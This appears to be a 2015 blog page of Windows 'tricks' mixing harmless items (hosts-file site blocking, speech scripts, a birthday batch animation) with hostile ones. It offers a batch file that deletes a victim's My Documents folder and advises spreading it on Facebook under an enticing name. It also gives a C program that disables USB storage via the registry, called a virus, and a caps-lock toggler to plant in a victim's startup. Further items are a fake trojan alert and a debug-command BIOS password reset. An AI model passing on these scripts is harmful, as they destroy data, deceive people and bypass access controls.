Thursday 5 November 2015

How To Block Websites Without Software

How To Block Websites Without Software
Steps:

1) Browse C:\WINDOWS\system32\drivers\etc
2) Find the file named "HOSTS"
3) Open it in notepad
4) Under "127.0.0.1 localhost" Add 127.0.0.2 www.sitenameyouwantblock.com , and that site will no longer be accessable.
5) Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.

IE:
127.0.0.3 www.site2.com
127.0.0.4 www.site3.com
127.0.0.5 www.site4.com

ass=MsoNoSpacing>By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password.

How to reset BIOS password using cmd

'I am going to tell you how to reset BIOS Password using Command Prompt.
YES!!
We can do it by using MS DOS Command.
This method works only if you have access to the system when its turned on because this method requires MS DOS. Open MS DOS from programs
menu and provide following commands one bye one:

debug
o 70 2E
o 71 FF
quit


NOTE:
The first character in the above commands is "O" and not the number 0.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS.
The "O" character present at first in these commands, outputs the values to IO ports.
The number 70 and 71 are port numbers which are used to access CMOS memory.
By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password.

Install any Software within 10 minutes

Today I am going to  tell you how to install XP or any other operating system within 10 minutes.


Not only Operating Systems, but this process speeds up installation of any other software also.
You may use this trick to speed up installation of .NET framework, Photoshop or any other software that takes much more time. We all know that after loading the file or copying the file from the boot disk to temporary space the system requires a first time reboot.
Now if we press shift+f10 then the command prompt will open.
Ø  Type "taskmgr" without quotes to open task manager.
Ø  Go to "processes" tab.
Ø  There we will find that a process is running named setup.exe
Ø  Now our task is to make the priority of this process maximumm by right clicking on that.
Ø  Right click on that. Click set priority and then set priotity to above normal or Real time.
We are done.

Note: This trick of setting priority can be applied to any software that takes much more time in installation like Visual Studio, MS Office, Adobe photoshop etc.

Check whether your computer is male or female

Check whether your computer is male or female
I am going to tell you to make a small script that will tell you to analyze gender of your computer.
Follow these steps:

1. Open Notepad
2. Type the following line in notepad:

CreateObject("SAPI.SpVoice").Speak"Good Morning"

3. Save file as- "computer_gender.vbs"
4. Run the file.
If you hear a male voice, you have a Male Computer
If you hear a female voice, you have a female Computer. 

Increase Virtual RAM

Increase Virtual RAM
I am going to tell you a trick that will increase your RAM virtually which will boost up your system.

Steps :- 

1) Hold down the 'Windows' key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Delete My Document folder of your enemy

Delete My Document folder of your enemy

Hello friends, today I will show you a simple prank that will delete My Document folder from your friends computer. This is quite simple. You have to make a batch file that will contain code for deleting the folder. Give it to any of your friend. For mass affect, you may upload it on Social media like facebook.
Give it a good name so that anyone can be eager to open the file.

STEPS:
1. Open Notepad and copy paste the following code in it.

rmdir C:\Documents and Settings \S\Q.

2. Save it as Virus.bat (any interesting name with .bat extension).
Now if you give this to someone and if he runs this program then his My Document folder will be deleted.

Warning: Run this code at your own risk.


Make a trojan virus fake message

I am going to tell you how to make a virus using notepad.
This is actually not a virus but a trick to fool your friends. They will understand that this is a virus.
Follow the instructions

1)Open the notepad and paste the following code.
2)Save it as "trojan.bat".

x=msgbox("Hi!!! Your computer is under risk. It contains viruses that cant be removed by your antivirus software." , ,"Trojan detected...")

When you click on this file then, it will say "Hi!!! Your computer is under risk. It contains viruses that cant be removed by your antivirus software".
You can change the message to any message you want.
After you are done with all send this batch file to your friend. He will get surprised that his PC is affected by trojan horse.
Enjoy :)

How to make GIF animation in Adobe Photoshop

There are a lot of software available to do this, but Photoshop is interesting one.
Before using this trick, your system must have Adobe Photoshop and Adone imageready installed.
Animation in Photoshop
1) Open Photoshop 5.5 (any version) and create a new image file measuring 100 by 100 pixels. Set the resolution to 72 pixels per inch and the mode to RGB color.

2)Choose Show Layers from the Window menu. This will bring up the Layers floating palette.

3)Select the pencil tool. Use it to draw a picture.

4)Click on the Layer palette's submenu arrow and select Duplicate Layer.

5)Click on the eyeball icon to the left of the bottom layer on the Layer palette. Use the pencil tool to add to the image on the top layer. Select the erase tool to remove part of the image.

6)Under the file menu, select Jump to, and then Adobe ImageReady 2.0. Save when prompted.


Animating in ImageReady
1)Choose Show Animation from the Window menu. This will bring up the Animation floating palette.

2)Click on the Animation palette's submenu arrow and select Make Frames from Layers.

3)Use Save Optimized As to save the animation under a new name

Make Birthday animation using command prompt

Make Birthday animation using command prompt
This trick does not require any technical skills.

Steps:

1. Open Notepad.
2. Copy and paste the following code in a notepad and save it as "Birthday.bat". In fact, you can give any name with extension *.bat (birthday.bat)
Double click on this batch file and see the animation.
You can present it to your friend.

Codes are:

@echo off
echo H
ping localhost -n 2 >nul
cls
echo Ha
ping localhost -n 2 >nul
cls
echo Hap
ping localhost -n 2 >nul
cls
echo Happ
ping localhost -n 2 >nul
cls
echo Happy
ping localhost -n 2 >nul
cls
echo Happy
ping localhost -n 2 >nul
cls
echo Happy B
ping localhost -n 2 >nul
cls
echo Happy Bi
ping localhost -n 2 >nul
cls
echo Happy Bir
ping localhost -n 2 >nul
cls
echo Happy Birt
ping localhost -n 2 >nul
cls
echo Happy Birth
ping localhost -n 2 >nul
cls
echo Happy Birthd
ping localhost -n 2 >nul
cls
echo Happy Birthda
ping localhost -n 2 >nul
cls
echo Happy Birthday
ping localhost -n 2 >nul
cls
echo Happy Birthday
ping localhost -n 2 >nul
cls
echo Happy Birthday t
ping localhost -n 2 >nul
cls
echo Happy Birthday to
ping localhost -n 2 >nul
cls
echo Happy Birthday to
ping localhost -n 2 >nul
cls
echo Happy Birthday to y
ping localhost -n 2 >nul
cls
echo Happy Birthday to yo
ping localhost -n 2 >nul
cls
echo Happy Birthday to you
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
 echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you......
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you
ping localhost -n 2 >nul
cls
 echo Happy Birthday to you
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.
ping localhost -n 2 >nul
cls
echo Happy Birthday to you..
ping localhost -n 2 >nul
cls
echo Happy Birthday to you...
ping localhost -n 2 >nul
cls
echo Happy Birthday to you....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you.....
ping localhost -n 2 >nul
cls
echo Happy Birthday to you......
ping localhost -n 2 >nul
cls

RESULT AFTER RUNNING IT  : 

Toggle caps lock automatically

Toggle caps lock automatically

Hello Friends, I think all of you have seen disco light effect in which light is turning on/off continuously.
I am going to tell a small VB script, which will toggle caps lock key infinitely at interval of 0.1 sec.
You can perform the same with other keys like Num lock and Scroll lock.
I am performing with Caps lock because an LED Glows with Caps lock On and you can see effect of disco light with it or you can irritate your victim by installing this script at start-up.

Follow the Steps :

1.) Open Notepad and copy the script given below into your notepad.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

2.) wscript.sleep 100 : Here 100 is the sleep interval between toggle in milliseconds
3.) Now Save it with extension as .vbs , like "script.vbs"
4.) Run it & see the magic.


Note : You can change the do loop to For loop. You can edit the Do Loop to control it with a counter Variable.

Make a Text to speech converter

Today I am going to you to make a small program using notepad which will speak for you, whatever you type in it. In short, its a text to speech converter made by you through notepad and without knowing any programming skill.

Steps:
1. Open notepad.
2. Copy and paste following code and save it as "speaker.vbs":

Dim userinputuserinput
userinputuserinput = inputbox("Type below to hear your computer speak")
set sapi = wscript.createobject("SAPI.Spvoice")
Sapi.speak userinputuserinput

3. Double click on speaker.vbs. A dialog box will be opened like
4. Type anything in English. Your computer will speak for you.

DONE!

Below is the screenshort of the program

USB Pen Drive Virus

USB Pen Drive Virus
Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++. When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.
Code is written to directly change the usb registry option and change its key.

Ø Creating usb-pendrive Virus :- 

Install Turbo C or C++Open TC.exe and there write the coding

#include<stdio.h>
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");

         Save The Above Program as usbblock.c or any other name.Compile and Run the above Program Congratulation! you are succesfull to create the usb-pendrive Virus.
Now go to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used & Run that usbblock.exe in your computer to test.
Attach Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virus Dont infect any other computer as it is only for educational purpose 

Ø To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-
Install Turbo C or C++

Open TC.exe and there write the coding

#include<stdio.h>
void main()
{

system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");

Save The Above Program as unblockusb.c or any other name.
Compile and Run the above Program
Congratulation! you are succesfull to create .exe file to unblock USB
Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used.
Run that unblockusb.exe to reverse the effect of usbblock.exe.